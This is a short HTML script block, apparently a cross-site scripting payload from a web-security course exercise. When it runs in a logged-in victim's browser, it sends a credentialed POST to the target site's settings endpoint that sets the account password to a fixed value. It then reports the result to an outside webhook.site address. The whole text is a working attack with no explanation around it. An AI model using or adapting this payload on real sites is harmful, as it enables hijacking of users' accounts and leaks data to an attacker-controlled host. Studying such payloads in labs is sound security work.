<script>
console.log('v3');

var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://cats.is-course.ru/settings', true);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

xhr.onreadystatechange = function() {
    if (xhr.readyState === 4) {
        var img = new Image();
        img.src = "https://webhook.site/bf30006e-dd6b-4685-8545-432615830517?status=" + xhr.status;
    }
};
xhr.send('password=Abcdef_1234567&confirm-password=Abcdef_1234567');
</script>
